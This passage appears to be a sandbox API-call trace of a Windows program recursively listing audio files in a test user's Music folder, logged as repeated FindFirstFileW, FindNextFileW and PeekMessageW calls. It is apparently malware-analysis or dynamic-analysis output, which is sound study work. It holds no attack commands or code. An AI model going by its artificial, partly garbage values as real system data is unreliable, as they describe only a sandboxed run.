dwReserved1=0x8a7560, cFileName="-eYbmJwmxhP", cAlternateFileName="-EYBMJ~1")) returned 1 [0157.889] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.889] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.889] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.889] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.889] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.889] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.889] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.889] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.890] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.890] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\*", lpFindFileData=0x87df28 | out: lpFindFileData=0x87df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6621ee0, ftCreationTime.dwHighDateTime=0x1d5e716, ftLastAccessTime.dwLowDateTime=0x47c27ea0, ftLastAccessTime.dwHighDateTime=0x1d5e6dc, ftLastWriteTime.dwLowDateTime=0x47c27ea0, ftLastWriteTime.dwHighDateTime=0x1d5e6dc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90b158 [0157.891] FindNextFileW (in: hFindFile=0x90b158, lpFindFileData=0x87df28 | out: lpFindFileData=0x87df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6621ee0, ftCreationTime.dwHighDateTime=0x1d5e716, ftLastAccessTime.dwLowDateTime=0x47c27ea0, ftLastAccessTime.dwHighDateTime=0x1d5e6dc, ftLastWriteTime.dwLowDateTime=0x47c27ea0, ftLastWriteTime.dwHighDateTime=0x1d5e6dc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.891] FindNextFileW (in: hFindFile=0x90b158, lpFindFileData=0x87df28 | out: lpFindFileData=0x87df28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f3a8660, ftCreationTime.dwHighDateTime=0x1d5de16, ftLastAccessTime.dwLowDateTime=0xbaaf0410, ftLastAccessTime.dwHighDateTime=0x1d5dc64, ftLastWriteTime.dwLowDateTime=0xbaaf0410, ftLastWriteTime.dwHighDateTime=0x1d5dc64, nFileSizeHigh=0x0, nFileSizeLow=0x181e2, dwReserved0=0x4, dwReserved1=0x8a7560, cFileName="Ftar8k3covO_ce7D.wav", cAlternateFileName="FTAR8K~1.WAV")) returned 1 [0157.891] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.891] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.891] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.891] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.891] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.891] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.891] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.891] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.891] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.891] FindNextFileW (in: hFindFile=0x90b158, lpFindFileData=0x87df10 | out: lpFindFileData=0x87df10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x223d2d0, ftCreationTime.dwHighDateTime=0x1d5da62, ftLastAccessTime.dwLowDateTime=0x2574c2b0, ftLastAccessTime.dwHighDateTime=0x1d5e60d, ftLastWriteTime.dwLowDateTime=0x2574c2b0, ftLastWriteTime.dwHighDateTime=0x1d5e60d, nFileSizeHigh=0x0, nFileSizeLow=0x122b9, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="teBq0VdNSx.wav", cAlternateFileName="TEBQ0V~1.WAV")) returned 1 [0157.891] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.891] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.891] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.892] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.892] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.892] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.892] FindNextFileW (in: hFindFile=0x90b158, lpFindFileData=0x87df10 | out: lpFindFileData=0x87df10*(dwFileAttributes=0x1960034, ftCreationTime.dwLowDateTime=0x4912, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x18c0035, nFileSizeHigh=0x4912, nFileSizeLow=0x9bade0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="te\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.892] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.892] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.892] FindClose (in: hFindFile=0x90b158 | out: hFindFile=0x90b158) returned 1 [0157.892] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e4dc) returned 0 [0157.892] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.892] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.892] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.892] FindNextFileW (in: hFindFile=0x90b098, lpFindFileData=0x87e168 | out: lpFindFileData=0x87e168*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbda6fa30, ftCreationTime.dwHighDateTime=0x1d5df8c, ftLastAccessTime.dwLowDateTime=0xfe7dc3e0, ftLastAccessTime.dwHighDateTime=0x1d5dfb4, ftLastWriteTime.dwLowDateTime=0xfe7dc3e0, ftLastWriteTime.dwHighDateTime=0x1d5dfb4, nFileSizeHigh=0x0, nFileSizeLow=0xa854, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="7iHROd3G.wav", cAlternateFileName="")) returned 1 [0157.892] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.892] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.892] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.892] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.893] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.893] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.893] FindNextFileW (in: hFindFile=0x90b098, lpFindFileData=0x87e168 | out: lpFindFileData=0x87e168*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x822c4ab0, ftCreationTime.dwHighDateTime=0x1d5dcc0, ftLastAccessTime.dwLowDateTime=0x45537f10, ftLastAccessTime.dwHighDateTime=0x1d5e179, ftLastWriteTime.dwLowDateTime=0x45537f10, ftLastWriteTime.dwHighDateTime=0x1d5e179, nFileSizeHigh=0x0, nFileSizeLow=0x64c5, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="K4cO 93Mbgwb3udHm.m4a", cAlternateFileName="K4CO93~1.M4A")) returned 1 [0157.893] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.893] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.893] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.893] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.893] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.893] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.893] FindNextFileW (in: hFindFile=0x90b098, lpFindFileData=0x87e168 | out: lpFindFileData=0x87e168*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6a4a880, ftCreationTime.dwHighDateTime=0x1d5d87d, ftLastAccessTime.dwLowDateTime=0xd95b64b0, ftLastAccessTime.dwHighDateTime=0x1d5df54, ftLastWriteTime.dwLowDateTime=0xd95b64b0, ftLastWriteTime.dwHighDateTime=0x1d5df54, nFileSizeHigh=0x0, nFileSizeLow=0x1bd9, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="KQpDY.m4a", cAlternateFileName="")) returned 1 [0157.893] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.893] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.893] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.893] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.893] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.893] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.894] FindNextFileW (in: hFindFile=0x90b098, lpFindFileData=0x87e168 | out: lpFindFileData=0x87e168*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8b7f0, ftCreationTime.dwHighDateTime=0x1d5e216, ftLastAccessTime.dwLowDateTime=0x8a4c7a00, ftLastAccessTime.dwHighDateTime=0x1d5da34, ftLastWriteTime.dwLowDateTime=0x8a4c7a00, ftLastWriteTime.dwHighDateTime=0x1d5da34, nFileSizeHigh=0x0, nFileSizeLow=0x77bb, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="LfTuLY5i.wav", cAlternateFileName="")) returned 1 [0157.894] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.894] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.894] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.894] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.894] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.894] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.894] FindNextFileW (in: hFindFile=0x90b098, lpFindFileData=0x87e168 | out: lpFindFileData=0x87e168*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1f88950, ftCreationTime.dwHighDateTime=0x1d5db3a, ftLastAccessTime.dwLowDateTime=0x15ec7d10, ftLastAccessTime.dwHighDateTime=0x1d5d8e8, ftLastWriteTime.dwLowDateTime=0x15ec7d10, ftLastWriteTime.dwHighDateTime=0x1d5d8e8, nFileSizeHigh=0x0, nFileSizeLow=0x10b3f, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="snzbfu-3Qx.m4a", cAlternateFileName="SNZBFU~1.M4A")) returned 1 [0157.894] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.894] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.894] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.894] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.894] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.894] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.894] FindNextFileW (in: hFindFile=0x90b098, lpFindFileData=0x87e168 | out: lpFindFileData=0x87e168*(dwFileAttributes=0x1760045, ftCreationTime.dwLowDateTime=0x496b, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x17a0046, nFileSizeHigh=0x496b, nFileSizeLow=0x2f, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="\x87\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.894] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.894] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.894] FindClose (in: hFindFile=0x90b098 | out: hFindFile=0x90b098) returned 1 [0157.895] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.895] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.895] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.895] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.895] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf67429e0, ftCreationTime.dwHighDateTime=0x1d5e65e, ftLastAccessTime.dwLowDateTime=0xd410af80, ftLastAccessTime.dwHighDateTime=0x1d5e380, ftLastWriteTime.dwLowDateTime=0xd410af80, ftLastWriteTime.dwHighDateTime=0x1d5e380, nFileSizeHigh=0x0, nFileSizeLow=0xdf62, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="APDdf3aoZrXaHEczyAP.wav", cAlternateFileName="APDDF3~1.WAV")) returned 1 [0157.896] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.896] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.896] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.896] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.896] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.896] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.896] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc9942e0, ftCreationTime.dwHighDateTime=0x1d5e43c, ftLastAccessTime.dwLowDateTime=0xf87f1f10, ftLastAccessTime.dwHighDateTime=0x1d5e37f, ftLastWriteTime.dwLowDateTime=0xf87f1f10, ftLastWriteTime.dwHighDateTime=0x1d5e37f, nFileSizeHigh=0x0, nFileSizeLow=0xcfe0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="LWhz.m4a", cAlternateFileName="")) returned 1 [0157.896] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.896] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.896] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.896] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.896] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.896] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.896] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d653a10, ftCreationTime.dwHighDateTime=0x1d5de51, ftLastAccessTime.dwLowDateTime=0x3ed32d90, ftLastAccessTime.dwHighDateTime=0x1d5e217, ftLastWriteTime.dwLowDateTime=0x3ed32d90, ftLastWriteTime.dwHighDateTime=0x1d5e217, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="rWwrmZhuo4", cAlternateFileName="RWWRMZ~1")) returned 1 [0157.896] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.896] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.896] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.896] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.896] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.896] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.897] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\*", lpFindFileData=0x87e180 | out: lpFindFileData=0x87e180*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d653a10, ftCreationTime.dwHighDateTime=0x1d5de51, ftLastAccessTime.dwLowDateTime=0x3ed32d90, ftLastAccessTime.dwHighDateTime=0x1d5e217, ftLastWriteTime.dwLowDateTime=0x3ed32d90, ftLastWriteTime.dwHighDateTime=0x1d5e217, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90b098 [0157.899] FindNextFileW (in: hFindFile=0x90b098, lpFindFileData=0x87e180 | out: lpFindFileData=0x87e180*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d653a10, ftCreationTime.dwHighDateTime=0x1d5de51, ftLastAccessTime.dwLowDateTime=0x3ed32d90, ftLastAccessTime.dwHighDateTime=0x1d5e217, ftLastWriteTime.dwLowDateTime=0x3ed32d90, ftLastWriteTime.dwHighDateTime=0x1d5e217, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.899] FindNextFileW (in: hFindFile=0x90b098, lpFindFileData=0x87e180 | out: lpFindFileData=0x87e180*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5992d6e0, ftCreationTime.dwHighDateTime=0x1d5dc44, ftLastAccessTime.dwLowDateTime=0x6a6a3790, ftLastAccessTime.dwHighDateTime=0x1d5e1af, ftLastWriteTime.dwLowDateTime=0x6a6a3790, ftLastWriteTime.dwHighDateTime=0x1d5e1af, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x8a7560, cFileName="eGfFOaa4l", cAlternateFileName="EGFFOA~1")) returned 1 [0157.900] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.900] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.900] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.900] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.900] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.900] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.900] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.900] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.900] PeekMessageW (in: lpMsg=0x87e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 